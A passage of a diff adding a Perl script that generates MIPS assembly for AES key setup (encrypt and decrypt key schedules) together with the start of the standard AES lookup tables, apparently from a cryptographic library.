+	.mask	$SAVED_REGS_MASK,-$SZREG
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /o32/i);	# o32 PIC-ification
+	.cpload	$pf
+___
+$code.=<<___;
+	$PTR_SUB $sp,$FRAMESIZE
+	$REG_S	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_S	$fp,$FRAMESIZE-2*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);	# optimize non-nubi prologue
+	$REG_S	$s3,$FRAMESIZE-3*$SZREG($sp)
+	$REG_S	$s2,$FRAMESIZE-4*$SZREG($sp)
+	$REG_S	$s1,$FRAMESIZE-5*$SZREG($sp)
+	$REG_S	$s0,$FRAMESIZE-6*$SZREG($sp)
+	$REG_S	$gp,$FRAMESIZE-7*$SZREG($sp)
+___
+$code.=<<___ if ($flavour !~ /o32/i);	# non-o32 PIC-ification
+	.cplocal	$Tbl
+	.cpsetup	$pf,$zero,private_AES_set_encrypt_key
+___
+$code.=<<___;
+	.set	reorder
+	la	$Tbl,AES_Te4		# PIC-ified 'load address'
+
+	bal	_mips_AES_set_encrypt_key
+
+	.set	noreorder
+	move	$a0,$t0
+	$REG_L	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_L	$fp,$FRAMESIZE-2*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$s3,$FRAMESIZE-11*$SZREG($sp)
+	$REG_L	$s2,$FRAMESIZE-12*$SZREG($sp)
+	$REG_L	$s1,$FRAMESIZE-13*$SZREG($sp)
+	$REG_L	$s0,$FRAMESIZE-14*$SZREG($sp)
+	$REG_L	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___;
+	jr	$ra
+	$PTR_ADD $sp,$FRAMESIZE
+.end	private_AES_set_encrypt_key
+___
+
+my ($head,$tail)=($inp,$bits);
+my ($tp1,$tp2,$tp4,$tp8,$tp9,$tpb,$tpd,$tpe)=($a4,$a5,$a6,$a7,$s0,$s1,$s2,$s3);
+my ($m,$x80808080,$x7f7f7f7f,$x1b1b1b1b)=($at,$t0,$t1,$t2);
+$code.=<<___;
+.align	5
+.globl	private_AES_set_decrypt_key
+.ent	private_AES_set_decrypt_key
+private_AES_set_decrypt_key:
+	.frame	$sp,$FRAMESIZE,$ra
+	.mask	$SAVED_REGS_MASK,-$SZREG
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /o32/i);	# o32 PIC-ification
+	.cpload	$pf
+___
+$code.=<<___;
+	$PTR_SUB $sp,$FRAMESIZE
+	$REG_S	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_S	$fp,$FRAMESIZE-2*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);	# optimize non-nubi prologue
+	$REG_S	$s3,$FRAMESIZE-3*$SZREG($sp)
+	$REG_S	$s2,$FRAMESIZE-4*$SZREG($sp)
+	$REG_S	$s1,$FRAMESIZE-5*$SZREG($sp)
+	$REG_S	$s0,$FRAMESIZE-6*$SZREG($sp)
+	$REG_S	$gp,$FRAMESIZE-7*$SZREG($sp)
+___
+$code.=<<___ if ($flavour !~ /o32/i);	# non-o32 PIC-ification
+	.cplocal	$Tbl
+	.cpsetup	$pf,$zero,private_AES_set_decrypt_key
+___
+$code.=<<___;
+	.set	reorder
+	la	$Tbl,AES_Te4		# PIC-ified 'load address'
+
+	bal	_mips_AES_set_encrypt_key
+
+	bltz	$t0,.Ldkey_done
+
+	sll	$at,$cnt,4
+	$PTR_ADD $head,$key,0
+	$PTR_ADD $tail,$key,$at
+.align	4
+.Lswap:
+	lw	$rk0,0($head)
+	lw	$rk1,4($head)
+	lw	$rk2,8($head)
+	lw	$rk3,12($head)
+	lw	$rk4,0($tail)
+	lw	$rk5,4($tail)
+	lw	$rk6,8($tail)
+	lw	$rk7,12($tail)
+	sw	$rk0,0($tail)
+	sw	$rk1,4($tail)
+	sw	$rk2,8($tail)
+	sw	$rk3,12($tail)
+	$PTR_ADD $head,16
+	$PTR_SUB $tail,16
+	sw	$rk4,-16($head)
+	sw	$rk5,-12($head)
+	sw	$rk6,-8($head)
+	sw	$rk7,-4($head)
+	bne	$head,$tail,.Lswap
+
+	lw	$tp1,16($key)		# modulo-scheduled
+	lui	$x80808080,0x8080
+	sub	$cnt,1
+	or	$x80808080,0x8080
+	sll	$cnt,2
+	$PTR_ADD $key,16
+	lui	$x1b1b1b1b,0x1b1b
+	nor	$x7f7f7f7f,$zero,$x80808080
+	or	$x1b1b1b1b,0x1b1b
+.align	4
+.Lmix:
+	and	$m,$tp1,$x80808080
+	and	$tp2,$tp1,$x7f7f7f7f
+	srl	$tp4,$m,7
+	addu	$tp2,$tp2		# tp2<<1
+	subu	$m,$tp4
+	and	$m,$x1b1b1b1b
+	xor	$tp2,$m
+
+	and	$m,$tp2,$x80808080
+	and	$tp4,$tp2,$x7f7f7f7f
+	srl	$tp8,$m,7
+	addu	$tp4,$tp4		# tp4<<1
+	subu	$m,$tp8
+	and	$m,$x1b1b1b1b
+	xor	$tp4,$m
+
+	and	$m,$tp4,$x80808080
+	and	$tp8,$tp4,$x7f7f7f7f
+	srl	$tp9,$m,7
+	addu	$tp8,$tp8		# tp8<<1
+	subu	$m,$tp9
+	and	$m,$x1b1b1b1b
+	xor	$tp8,$m
+
+	xor	$tp9,$tp8,$tp1
+	xor	$tpe,$tp8,$tp4
+	xor	$tpb,$tp9,$tp2
+	xor	$tpd,$tp9,$tp4
+
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	rotr	$tp1,$tpd,16
+	 xor	$tpe,$tp2
+	rotr	$tp2,$tp9,8
+	xor	$tpe,$tp1
+	rotr	$tp4,$tpb,24
+	xor	$tpe,$tp2
+	lw	$tp1,4($key)		# modulo-scheduled
+	xor	$tpe,$tp4
+#else
+	_ror	$tp1,$tpd,16
+	 xor	$tpe,$tp2
+	_ror	$tp2,$tpd,-16
+	xor	$tpe,$tp1
+	_ror	$tp1,$tp9,8
+	xor	$tpe,$tp2
+	_ror	$tp2,$tp9,-24
+	xor	$tpe,$tp1
+	_ror	$tp1,$tpb,24
+	xor	$tpe,$tp2
+	_ror	$tp2,$tpb,-8
+	xor	$tpe,$tp1
+	lw	$tp1,4($key)		# modulo-scheduled
+	xor	$tpe,$tp2
+#endif
+	sub	$cnt,1
+	sw	$tpe,0($key)
+	$PTR_ADD $key,4
+	bnez	$cnt,.Lmix
+
+	li	$t0,0
+.Ldkey_done:
+	.set	noreorder
+	move	$a0,$t0
+	$REG_L	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_L	$fp,$FRAMESIZE-2*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$s3,$FRAMESIZE-11*$SZREG($sp)
+	$REG_L	$s2,$FRAMESIZE-12*$SZREG($sp)
+	$REG_L	$s1,$FRAMESIZE-13*$SZREG($sp)
+	$REG_L	$s0,$FRAMESIZE-14*$SZREG($sp)
+	$REG_L	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___;
+	jr	$ra
+	$PTR_ADD $sp,$FRAMESIZE
+.end	private_AES_set_decrypt_key
+___
+}}}
+
+######################################################################
+# Tables are kept in endian-neutral manner
+$code.=<<___;
+.rdata
+.align	10
+AES_Te:
+.byte	0xc6,0x63,0x63,0xa5,	0xf8,0x7c,0x7c,0x84	# Te0
+.byte	0xee,0x77,0x77,0x99,	0xf6,0x7b,0x7b,0x8d
+.byte	0xff,0xf2,0xf2,0x0d,	0xd6,0x6b,0x6b,0xbd
+.byte	0xde,0x6f,0x6f,0xb1,	0x91,0xc5,0xc5,0x54
+.byte	0x60,0x30,0x30,0x50,	0x02,0x01,0x01,0x03
+.byte	0xce,0x67,0x67,0xa9,	0x56,0x2b,0x2b,0x7d
+.byte	0xe7,0xfe,0xfe,0x19,	0xb5,0xd7,0xd7,0x62
+.byte	0x4d,0xab,0xab,0xe6,	0xec,0x76,0x76,0x9a
+.byte	0x8f,0xca,0xca,0x45,	0x1f,0x82,0x82,0x9d
+.byte	0x89,0xc9,0xc9,0x40,	0xfa,0x7d,0x7d,0x87
+.byte	0xef,0xfa,0xfa,0x15,	0xb2,0x59,0x59,0xeb
+.byte	0x8e,0x47,0x47,0xc9,	0xfb,0xf0,0xf0,0x0b
+.byte	0x41,0xad,0xad,0xec,	0xb3,0xd4,0xd4,0x67
+.byte	0x5f,0xa2,0xa2,0xfd,	0x45,0xaf,0xaf,0xea
+.byte	0x23,0x9c,0x9c,0xbf,	0x53,0xa4,0xa4,0xf7
+.byte	0xe4,0x72,0x72,0x96,	0x9b,0xc0,0xc0,0x5b
+.byte	0x75,0xb7,0xb7,0xc2,	0xe1,0xfd,0xfd,0x1c
+.byte	0x3d,0x93,0x93,0xae,	0x4c,0x26,0x26,0x6a
+.byte	0x6c,0x36,0x36,0x5a,	0x7e,0x3f,0x3f,0x41
+.byte	0xf5,0xf7,0xf7,0x02,	0x83,0xcc,0xcc,0x4f
+.byte	0x68,0x34,0x34,0x5c,	0x51,0xa5,0xa5,0xf4
+.byte	0xd1,0xe5,0xe5,0x34,	0xf9,0xf1,0xf1,0x08
+.byte	0xe2,0x71,0x71,0x93,	0xab,0xd8,0xd8,0x73
+.byte	0x62,0x31,0x31,0x53,	0x2a,0x15,0x15,0x3f
+.byte	0x08,0x04,0x04,0x0c,	0x95,0xc7,0xc7,0x52
+.byte	0x46,0x23,0x23,0x65,	0x9d,0xc3,0xc3,0x5e
+.byte	0x30,0x18,0x18,0x28,	0x37,0x96,0x96,0xa1
+.byte	0x0a,0x05,0x05,0x0f,	0x2f,0x9a,0x9a,0xb5
+.byte	0x0e,0x07,0x07,0x09,	0x24,0x12,0x12,0x36
+.byte	0x1b,0x80,0x80,0x9b,	0xdf,0xe2,0xe2,0x3d
+.byte	0xcd,0xeb,0xeb,0x26,	0x4e,0x27,0x27,0x69
+.byte	0x7f,0xb2,0xb2,0xcd,	0xea,0x75,0x75,0x9f
+.byte	0x12,0x09,0x09,0x1b,	0x1d,0x83,0x83,0x9e
+.byte	0x58,0x2c,0x2c,0x74,	0x34,0x1a,0x1a,0x2e
+.byte	0x36,0x1b,0x1b,0x2d,	0xdc,0x6e,0x6e,0xb2
+.byte	0xb4,0x5a,0x5a,0xee,	0x5b,0xa0,0xa0,0xfb
+.byte	0xa4,0x52,0x52,0xf6,	0x76,0x3b,0x3b,0x4d
+.byte	0xb7,0xd6,0xd6,0x61,	0x7d,0xb3,0xb3,0xce
+.byte	0x52,0x29,0x29,0x7b,	0xdd,0xe3,0xe3,0x3e
+.byte	0x5e,0x2f,0x2f,0x71,	0x13,0x84,0x84,0x97
+.byte	0xa6,0x53,0x53,0xf5,	0xb9,0xd1,0xd1,0x68
+.byte	0x00,0x00,0x00,0x00,	0xc1,0xed,0xed,0x2c
+.byte	0x40,0x20,0x20,0x60,	0xe3,0xfc,0xfc,0x1f
+.byte	0x79,0xb1,0xb1,0xc8,	0xb6,0x5b,0x5b,0xed
+.byte	0xd4,0x6a,0x6a,0xbe,	0x8d,0xcb,0xcb,0x46
+.byte	0x67,0xbe,0xbe,0xd9,	0x72,0x39,0x39,0x4b
+.byte	0x94,0x4a,0x4a,0xde,	0x98,0x4c,0x4c,0xd4
+.byte	0xb0,0x58,0x58,0xe8,	0x85,0xcf,0xcf,0x4a
+.byte	0xbb,0xd0,0xd0,0x6b,	0xc5,0xef,0xef,0x2a
+.byte	0x4f,0xaa,0xaa,0xe5,	0xed,0xfb,0xfb,0x16
+.byte	0x86,0x43,0x43,0xc5,	0x9a,0x4d,0x4d,0xd7
+.byte	0x66,0x33,0x33,0x55,	0x11,0x85,0x85,0x94
+.byte	0x8a,0x45,0x45,0xcf,	0xe9,0xf9,0xf9,0x10
+.byte	0x04,0x02,0x02,0x06,	0xfe,0x7f,0x7f,0x81
+.byte	0xa0,0x50,0x50,0xf0,	0x78,0x3c,0x3c,0x44
+.byte	0x25,0x9f,0x9f,0xba,	0x4b,0xa8,0xa8,0xe3
+.byte	0xa2,0x51,0x51,0xf3,	0x5d,0xa3,0xa3,0xfe
+.byte	0x80,0x40,0x40,0xc0,	0x05,0x8f,0x8f,0x8a
+.byte	0x3f,0x92,0x92,0xad,	0x21,0x9d,0x9d,0xbc
+.byte	0x70,0x38,0x38,0x48,	0xf1,0xf5,0xf5,0x04
+.byte	0x63,0xbc,0xbc,0xdf,	0x77,0xb6,0xb6,0xc1
+.byte	0xaf,0xda,0xda,0x75,	0x42,0x21,0x21,0x63
+.byte	0x20,0x10,0x10,0x30,	0xe5,0xff,0xff,0x1a
+.byte	0xfd,0xf3,0xf3,0x0e,	0xbf,0xd2,0xd2,0x6d
+.byte	0x81,0xcd,0xcd,0x4c,	0x18,0x0c,0x0c,0x14
+.byte	0x26,0x13,0x13,0x35,	0xc3,0xec,0xec,0x2f
+.byte	0xbe,0x5f,0x5f,0xe1,	0x35,0x97,0x97,0xa2
+.byte	0x88,0x44,0x44,0xcc,	0x2e,0x17,0x17,0x39
+.byte	0x93,0xc4,0xc4,0x57,	0x55,0xa7,0xa7,0xf2
+.byte	0xfc,0x7e,0x7e,0x82,	0x7a,0x3d,0x3d,0x47
+.byte	0xc8,0x64,0x64,0xac,	0xba,0x5d,0x5d,0xe7
+.byte	0x32,0x19,0x19,0x2b,	0xe6,0x73,0x73,0x95
+.byte	0xc0,0x60,0x60,0xa0,	0x19,0x81,0x81,0x98
+.byte	0x9e,0x4f,0x4f,0xd1,	0xa3,0xdc,0xdc,0x7f
+.byte	0x44,0x22,0x22,0x66,	0x54,0x2a,0x2a,0x7e
+.byte	0x3b,0x90,0x90,0xab,	0x0b,0x88,0x88,0x83
+.byte	0x8c,0x46,0x46,0xca,	0xc7,0xee,0xee,0x29
+.byte	0x6b,0xb8,0xb8,0xd3,	0x28,0x14,0x14,0x3c
+.byte	0xa7,0xde,0xde,0x79,	0xbc,0x5e,0x5e,0xe2
+.byte	0x16,0x0b,0x0b,0x1d,	0xad,0xdb,0xdb,0x76
+.byte	0xdb,0xe0,0xe0,0x3b,	0x64,0x32,0x32,0x56
+.byte	0x74,0x3a,0x3a,0x4e,	0x14,0x0a,0x0a,0x1e
+.byte	0x92,0x49,0x49,0xdb,	0x0c,0x06,0x06,0x0a
+.byte	0x48,0x24,0x24,0x6c,	0xb8,0x5c,0x5c,0xe4
+.byte	0x9f,0xc2,0xc2,0x5d,	0xbd,0xd3,0xd3,0x6e
+.byte	0x43,0xac,0xac,0xef,	0xc4,0x62,0x62,0xa6
+.byte	0x39,0x91,0x91,0xa8,	0x31,0x95,0x95,0xa4
+.byte	0xd3,0xe4,0xe4,0x37,	0xf2,0x79,0x79,0x8b
+.byte	0xd5,0xe7,0xe7,0x32,	0x8b,0xc8,0xc8,0x43
+.byte	0x6e,0x37,0x37,0x59,	0xda,0x6d,0x6d,0xb7
+.byte	0x01,0x8d,0x8d,0x8c,	0xb1,0xd5,0xd5,0x64
+.byte	0x9c,0x4e,0x4e,0xd2,	0x49,0xa9,0xa9,0xe0
+.byte	0xd8,0x6c,0x6c,0xb4,	0xac,0x56,0x56,0xfa
+.byte	0xf3,0xf4,0xf4,0x07,	0xcf,0xea,0xea,0x25
+.byte	0xca,0x65,0x65,0xaf,	0xf4,0x7a,0x7a,0x8e
+.byte	0x47,0xae,0xae,0xe9,	0x10,0x08,0x08,0x18
+.byte	0x6f,0xba,0xba,0xd5,	0xf0,0x78,0x78,0x88
+.byte	0x4a,0x25,0x25,0x6f,	0x5c,0x2e,0x2e,0x72
+.byte	0x38,0x1c,0x1c,0x24,	0x57,0xa6,0xa6,0xf1
+.byte	0x73,0xb4,0xb4,0xc7,	0x97,0xc6,0xc6,0x51
+.byte	0xcb,0xe8,0xe8,0x23,	0xa1,0xdd,0xdd,0x7c
+.byte	0xe8,0x74,0x74,0x9c,	0x3e,0x1f,0x1f,0x21
+.byte	0x96,0x4b,0x4b,0xdd,	0x61,0xbd,0xbd,0xdc
+.byte	0x0d,0x8b,0x8b,0x86,	0x0f,0x8a,0x8a,0x85
+.byte	0xe0,0x70,0x70,0x90,	0x7c,0x3e,0x3e,0x42
+.byte	0x71,0xb5,0xb5,0xc4,	0xcc,0x66,0x66,0xaa
+.byte	0x90,0x48,0x48,0xd8,	0x06,0x03,0x03,0x05
+.byte	0xf7,0xf6,0xf6,0x01,	0x1c,0x0e,0x0e,0x12
+.byte	0xc2,0x61,0x61,0xa3,	0x6a,0x35,0x35,0x5f
+.byte	0xae,0x57,0x57,0xf9,	0x69,0xb9,0xb9,0xd0
+.byte	0x17,0x86,0x86,0x91,	0x99,0xc1,0xc1,0x58
+.byte	0x3a,0x1d,0x1d,0x27,	0x27,0x9e,0x9e,0xb9
+.byte	0xd9,0xe1,0xe1,0x38,	0xeb,0xf8,0xf8,0x13
+.byte	0x2b,0x98,0x98,0xb3,	0x22,0x11,0x11,0x33
+.byte	0xd2,0x69,0x69,0xbb,	0xa9,0xd9,0xd9,0x70
+.byte	0x07,0x8e,0x8e,0x89,	0x33,0x94,0x94,0xa7
+.byte	0x2d,0x9b,0x9b,0xb6,	0x3c,0x1e,0x1e,0x22
+.byte	0x15,0x87,0x87,0x92,	0xc9,0xe9,0xe9,0x20
+.byte	0x87,0xce,0xce,0x49,	0xaa,0x55,0x55,0xff
+.byte	0x50,0x28,0x28,0x78,	0xa5,0xdf,0xdf,0x7a
+.byte	0x03,0x8c,0x8c,0x8f,	0x59,0xa1,0xa1,0xf8
+.byte	0x09,0x89,0x89,0x80,	0x1a,0x0d,0x0d,0x17
+.byte	0x65,0xbf,0xbf,0xda,	0xd7,0xe6,0xe6,0x31
+.byte	0x84,0x42,0x42,0xc6,	0xd0,0x68,0x68,0xb8
+.byte	0x82,0x41,0x41,0xc3,	0x29,0x99,0x99,0xb0
+.byte	0x5a,0x2d,0x2d,0x77,	0x1e,0x0f,0x0f,0x11
+.byte	0x7b,0xb0,0xb0,0xcb,	0xa8,0x54,0x54,0xfc
+.byte	0x6d,0xbb,0xbb,0xd6,	0x2c,0x16,0x16,0x3a
+
+AES_Td:
+.byte	0x51,0xf4,0xa7,0x50,	0x7e,0x41,0x65,0x53	# Td0
+.byte	0x1a,0x17,0xa4,0xc3,	0x3a,0x27,0x5e,0x96
+.byte	0x3b,0xab,0x6b,0xcb,	0x1f,0x9d,0x45,0xf1
+.byte	0xac,0xfa,0x58,0xab,	0x4b,0xe3,0x03,0x93
+.byte	0x20,0x30,0xfa,0x55,	0xad,0x76,0x6d,0xf6
+.byte	0x88,0xcc,0x76,0x91,	0xf5,0x02,0x4c,0x25
+.byte	0x4f,0xe5,0xd7,0xfc,	0xc5,0x2a,0xcb,0xd7
+.byte	0x26,0x35,0x44,0x80,	0xb5,0x62,0xa3,0x8f
+.byte	0xde,0xb1,0x5a,0x49,	0x25,0xba,0x1b,0x67
+.byte	0x45,0xea,0x0e,0x98,	0x5d,0xfe,0xc0,0xe1
+.byte	0xc3,0x2f,0x75,0x02,	0x81,0x4c,0xf0,0x12
+.byte	0x8d,0x46,0x97,0xa3,	0x6b,0xd3,0xf9,0xc6
+.byte	0x03,0x8f,0x5f,0xe7,	0x15,0x92,0x9c,0x95
+.byte	0xbf,0x6d,0x7a,0xeb,	0x95,0x52,0x59,0xda
+.byte	0xd4,0xbe,0x83,0x2d,	0x58,0x74,0x21,0xd3
+.byte	0x49,0xe0,0x69,0x29,	0x8e,0xc9,0xc8,0x44
+.byte	0x75,0xc2,0x89,0x6a,	0xf4,0x8e,0x79,0x78
+.byte	0x99,0x58,0x3e,0x6b,	0x27,0xb9,0x71,0xdd
+.byte	0xbe,0xe1,0x4f,0xb6,	0xf0,0x88,0xad,0x17
+.byte	0xc9,0x20,0xac,0x66,	0x7d,0xce,0x3a,0xb4
+.byte	0x63,0xdf,0x4a,0x18,	0xe5,0x1a,0x31,0x82
+.byte	0x97,0x51,0x33,0x60,	0x62,0x53,0x7f,0x45
+.byte	0xb1,0x64,0x77,0xe0,	0xbb,0x6b,0xae,0x84
+.byte	0xfe,0x81,0xa0,0x1c,	0xf9,0x08,0x2b,0x94
+.byte	0x70,0x48,0x68,0x58,	0x8f,0x45,0xfd,0x19
+.byte	0x94,0xde,0x6c,0x87,	0x52,0x7b,0xf8,0xb7
+.byte	0xab,0x73,0xd3,0x23,	0x72,0x4b,0x02,0xe2
+.byte	0xe3,0x1f,0x8f,0x57,	0x66,0x55,0xab,0x2a
+.byte	0xb2,0xeb,0x28,0x07,	0x2f,0xb5,0xc2,0x03
+.byte	0x86,0xc5,0x7b,0x9a,	0xd3,0x37,0x08,0xa5
+.byte	0x30,0x28,0x87,0xf2,	0x23,0xbf,0xa5,0xb2
+.byte	0x02,0x03,0x6a,0xba,	0xed,0x16,0x82,0x5c
+.byte	0x8a,0xcf,0x1c,0x2b,	0xa7,0x79,0xb4,0x92
+.byte	0xf3,0x07,0xf2,0xf0,	0x4e,0x69,0xe2,0xa1
+.byte	0x65,0xda,0xf4,0xcd,	0x06,0x05,0xbe,0xd5
+.byte	0xd1,0x34,0x62,0x1f,	0xc4,0xa6,0xfe,0x8a
+.byte	0x34,0x2e,0x53,0x9d,	0xa2,0xf3,0x55,0xa0
+.byte	0x05,0x8a,0xe1,0x32,	0xa4,0xf6,0xeb,0x75
+.byte	0x0b,0x83,0xec,0x39,	0x40,0x60,0xef,0xaa
+.byte	0x5e,0x71,0x9f,0x06,	0xbd,0x6e,0x10,0x51
+.byte	0x3e,0x21,0x8a,0xf9,	0x96,0xdd,0x06,0x3d
+.byte	0xdd,0x3e,0x05,0xae,	0x4d,0xe6,0xbd,0x46
+.byte	0x91,0x54,0x8d,0xb5,	0x71,0xc4,0x5d,0x05
+.byte	0x04,0x06,0xd4,0x6f,	0x60,0x50,0x15,0xff
+.byte	0x19,0x98,0xfb,0x24,	0xd6,0xbd,0xe9,0x97
+.byte	0x89,0x40,0x43,0xcc,	0x67,0xd9,0x9e,0x77
+.byte	0xb0,0xe8,0x42,0xbd,	0x07,0x89,0x8b,0x88
+.byte	0xe7,0x19,0x5b,0x38,	0x79,0xc8,0xee,0xdb
+.byte	0xa1,0x7c,0x0a,0x47,	0x7c,0x42,0x0f,0xe9
+.byte	0xf8,0x84,0x1e,0xc9,	0x00,0x00,0x00,0x00
+.byte	0x09,0x80,0x86,0x83,	0x32,0x2b,0xed,0x48
+.byte	0x1e,0x11,0x70,0xac,	0x6c,0x5a,0x72,0x4e
+.byte	0xfd,0x0e,0xff,0xfb,	0x0f,0x85,0x38,0x56
+.byte	0x3d,0xae,0xd5,0x1e,	0x36,0x2d,0x39,0x27
+.byte	0x0a,0x0f,0xd9,0x64,	0x68,0x5c,0xa6,0x21
+.byte	0x9b,0x5b,0x54,0xd1,	0x24,0x36,0x2e,0x3a
+.byte	0x0c,0x0a,0x67,0xb1,	0x93,0x57,0xe7,0x0f
+.byte	0xb4,0xee,0x96,0xd2,	0x1b,0x9b,0x91,0x9e
+.byte	0x80,0xc0,0xc5,0x4f,	0x61,0xdc,0x20,0xa2
+.byte	0x5a,0x77,0x4b,0x69,	0x1c,0x12,0x1a,0x16
+.byte	0xe2,0x93,0xba,0x0a,	0xc0,0xa0,0x2a,0xe5
+.byte	0x3c,0x22,0xe0,0x43,	0x12,0x1b,0x17,0x1d
+.byte	0x0e,0x09,0x0d,0x0b,	0xf2,0x8b,0xc7,0xad
+.byte	0x2d,0xb6,0xa8,0xb9,	0x14,0x1e,0xa9,0xc8
+.byte	0x57,0xf1,0x19,0x85,	0xaf,0x75,0x07,0x4c
+.byte	0xee,0x99,0xdd,0xbb,	0xa3,0x7f,0x60,0xfd
+.byte	0xf7,0x01,0x26,0x9f,	0x5c,0x72,0xf5,0xbc
+.byte	0x44,0x66,0x3b,0xc5,	0x5b,0xfb,0x7e,0x34
+.byte	0x8b,0x43,0x29,0x76,	0xcb,0x23,0xc6,0xdc
+.byte	0xb6,0xed,0xfc,0x68,	0xb8,0xe4,0xf1,0x63
+.byte	0xd7,0x31,0xdc,0xca,	0x42,0x63,0x85,0x10
+.byte	0x13,0x97,0x22,0x40,	0x84,0xc6,0x11,0x20
+.byte	0x85,0x4a,0x24,0x7d,	0xd2,0xbb,0x3d,0xf8
+.byte	0xae,0xf9,0x32,0x11,	0xc7,0x29,0xa1,0x6d
+.byte	0x1d,0x9e,0x2f,0x4b,	0xdc,0xb2,0x30,0xf3
+.byte	0x0d,0x86,0x52,0xec,	0x77,0xc1,0xe3,0xd0
+.byte	0x2b,0xb3,0x16,0x6c,	0xa9,0x70,0xb9,0x99
+.byte	0x11,0x94,0x48,0xfa,	0x47,0xe9,0x64,0x22
+.byte	0xa8,0xfc,0x8c,0xc4,	0xa0,0xf0,0x3f,0x1a
+.byte	0x56,0x7d,0x2c,0xd8,	0x22,0x33,0x90,0xef
+.byte	0x87,0x49,0x4e,0xc7,	0xd9,0x38,0xd1,0xc1
+.byte	0x8c,0xca,0xa2,0xfe,	0x98,0xd4,0x0b,0x36
+.byte	0xa6,0xf5,0x81,0xcf,	0xa5,0x7a,0xde,0x28
+.byte	0xda,0xb7,0x8e,0x26,	0x3f,0xad,0xbf,0xa4
+.byte	0x2c,0x3a,0x9d,0xe4,	0x50,0x78,0x92,0x0d
+.byte	0x6a,0x5f,0xcc,0x9b,	0x54,0x7e,0x46,0x62
+.byte	0xf6,0x8d,0x13,0xc2,	0x90,0xd8,0xb8,0xe8
+.byte	0x2e,0x39,0xf7,0x5e,	0x82,0xc3,0xaf,0xf5
+.byte	0x9f,0x5d,0x80,0xbe,	0x69,0xd0,0x93,0x7c
+.byte	0x6f,0xd5,0x2d,0xa9,	0xcf,0x25,0x12,0xb3
+.byte	0xc8,0xac,0x99,0x3b,	0x10,0x18,0x7d,0xa7
+.byte	0xe8,0x9c,0x63,0x6e,	0xdb,0x3b,0xbb,0x7b
+.byte	0xcd,0x26,0x78,0x09,	0x6e,0x59,0x18,0xf4
+.byte	0xec,0x9a,0xb7,0x01,	0x83,0x4f,0x9a,0xa8
+.byte	0xe6,0x95,0x6e,0x65,	0xaa,0xff,0xe6,0x7e
+.byte	0x21,0xbc,0xcf,0x08,	0xef,0x15,0xe8,0xe6
+.byte	0xba,0xe7,0x9b,0xd9,	0x4a,0x6f,0x36,0xce
+.byte	0xea,0x9f,0x09,0xd4,	0x29,0xb0,0x7c,0xd6
+.byte	0x31,0xa4,0xb2,0xaf,	0x2a,0x3f,0x23,0x31
+.byte	0xc6,0xa5,0x94,0x30,	0x35,0xa2,0x66,0xc0
+.byte	0x74,0x4e,0xbc,0x37,	0xfc,0x82,0xca,0xa6
+.byte	0xe0,0x90,0xd0,0xb0,	0x33,0xa7,0xd8,0x15
+.byte	0xf1,0x04,0x98,0x4a,	0x41,0xec,0xda,0xf7
+.byte	0x7f,0xcd,0x50,0x0e,	0x17,0x91,0xf6,0x2f
+.byte	0x76,0x4d,0xd6,0x8d,	0x43,0xef,0xb0,0x4d
+.byte	0xcc,0xaa,0x4d,0x54,	0xe4,0x96,0x04,0xdf
+.byte	0x9e,0xd1,0xb5,0xe3,	0x4c,0x6a,0x88,0x1b
+.byte	0xc1,0x2c,0x1f,0xb8,	0x46,0x65,0x51,0x7f
+.byte	0x9d,0x5e,0xea,0x04,	0x01,0x8c,0x35,0x5d
+.byte	0xfa,0x87,0x74,0x73,	0xfb,0x0b,0x41,0x2e
+.byte	0xb3,0x67,0x1d,0x5a,	0x92,0xdb,0xd2,0x52
+.byte	0xe9,0x10,0x56,0x33,	0x6d,0xd6,0x47,0x13
+.byte	0x9a,0xd7,0x61,0x8c,	0x37,0xa1,0x0c,0x7a
+.byte	0x59,0xf8,0x14,0x8e,	0xeb,0x13,0x3c,0x89
+.byte	0xce,0xa9,0x27,0xee,	0xb7,0x61,0xc9,0x35
+.byte	0xe1,0x1c,0xe5,0xed,	0x7a,0x47,0xb1,0x3c
+.byte	0x9c,0xd2,0xdf,0x59,	0x55,0xf2,0x73,0x3f
+.byte	0x18,0x14,0xce,0x79,	0x73,0xc7,0x37,0xbf
+.byte	0x53,0xf7,0xcd,0xea,	0x5f,0xfd,0xaa,0x5b
+.byte	0xdf,0x3d,0x6f,0x14,	0x78,0x44,0xdb,0x86
+.byte	0xca,0xaf,0xf3,0x81,	0xb9,0x68,0xc4,0x3e
+.byte	0x38,0x24,0x34,0x2c,	0xc2,0xa3,0x40,0x5f
+.byte	0x16,0x1d,0xc3,0x72,	0xbc,0xe2,0x25,0x0c
+.byte	0x28,0x3c,0x49,0x8b,	0xff,0x0d,0x95,0x41
+.byte	0x39,0xa8,0x01,0x71,	0x08,0x0c,0xb3,0xde
+.byte	0xd8,0xb4,0xe4,0x9c,	0x64,0x56,0xc1,0x90
+.byte	0x7b,0xcb,0x84,0x61,	0xd5,0x32,0xb6,0x70
+.byte	0x48,0x6c,0x5c,0x74,	0xd0,0xb8,0x57,0x42
+
+.byte	0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38	# Td4
+.byte	0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
+.byte	0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
+.byte	0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
+.byte	0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
+.byte	0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
+.byte	0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
+.byte	0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
